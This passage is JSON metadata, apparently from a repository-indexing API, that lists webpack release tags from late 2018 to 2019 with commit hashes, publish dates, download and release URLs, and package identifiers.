_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwe